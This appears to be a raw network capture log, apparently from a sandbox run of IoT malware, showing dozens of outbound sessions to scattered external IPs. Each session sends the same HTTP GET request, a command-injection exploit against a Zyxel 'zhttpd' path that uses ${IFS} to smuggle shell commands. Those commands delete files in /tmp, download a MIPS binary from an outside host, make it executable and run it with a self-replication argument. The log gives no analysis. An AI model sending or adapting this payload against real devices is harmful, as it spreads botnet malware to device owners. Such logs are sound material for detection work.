                                                Jan 12, 2024 18:16:13.213907003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2062192.168.2.2350790111.196.113.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213954926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2063192.168.2.236086682.159.253.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214014053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2064192.168.2.235711083.151.80.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214039087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2065192.168.2.2333432140.35.20.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214061022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2066192.168.2.2349250201.45.231.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214082956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2067192.168.2.235070836.33.14.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214109898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2068192.168.2.2352206132.91.183.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214158058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2069192.168.2.233805664.138.35.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214180946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2070192.168.2.233738639.41.145.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214229107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2071192.168.2.235907272.150.217.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214252949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2072192.168.2.234619247.0.180.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214286089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2073192.168.2.234741441.72.49.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214334965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2074192.168.2.2356482174.192.211.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214376926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2075192.168.2.234920468.215.16.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214415073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2076192.168.2.234828836.108.234.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214435101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2077192.168.2.2344642217.206.250.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214462042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2078192.168.2.2335666188.228.110.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214500904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2079192.168.2.2354606154.0.16.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214526892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2080192.168.2.234132074.151.240.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214592934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2081192.168.2.2357880180.208.142.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214617014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2082192.168.2.2347076150.41.234.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214626074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2083192.168.2.233598683.4.18.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214667082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2084192.168.2.234696640.53.76.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214715958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2085192.168.2.2341784185.142.93.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214735031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2086192.168.2.2334240148.213.254.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214775085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2087192.168.2.2347948172.116.64.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214796066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2088192.168.2.2340308124.47.93.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214845896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2089192.168.2.2347124166.32.84.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214880943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2090192.168.2.2339280107.245.55.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214909077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2091192.168.2.235644834.87.231.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.214936972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2092192.168.2.2351156179.45.149.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226486921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2093192.168.2.2333988122.212.151.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226540089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2094192.168.2.2354854156.124.131.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226572037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2095192.168.2.2342150172.210.173.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226605892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2096192.168.2.234269267.36.57.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226651907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2097192.168.2.2350286185.138.39.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226686954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2098192.168.2.234896019.107.80.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226725101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2099192.168.2.2333526139.165.217.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226769924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2100192.168.2.235830498.19.183.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226829052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2101192.168.2.2352364137.215.67.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226854086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2102192.168.2.23538361.250.212.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226896048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2103192.168.2.234016861.121.128.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226929903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2104192.168.2.2349612159.57.43.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.226955891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2105192.168.2.2357270121.82.119.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227022886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2106192.168.2.2344706211.130.241.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227050066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2107192.168.2.234612445.196.35.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227098942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2108192.168.2.2343994212.66.54.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227128983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2109192.168.2.2334942114.91.205.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227152109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2110192.168.2.2346660162.103.87.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227190971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2111192.168.2.2341036193.231.139.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227231979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2112192.168.2.234188075.3.237.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227284908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2113192.168.2.2353822100.59.73.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227322102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2114192.168.2.2347932176.101.240.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227351904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2115192.168.2.235601283.112.238.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227396011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2116192.168.2.2350964149.185.2.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227432013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2117192.168.2.235677423.121.7.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227485895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2118192.168.2.2359064200.88.27.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227536917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2119192.168.2.235859660.192.66.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227557898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2120192.168.2.2344040160.62.246.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227617025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2121192.168.2.234975280.195.115.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227648020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2122192.168.2.235306617.215.107.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227684021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2123192.168.2.2342460209.236.209.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227719069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2124192.168.2.235205471.145.159.125443
                                                TimestampBytes transferredDirectionData
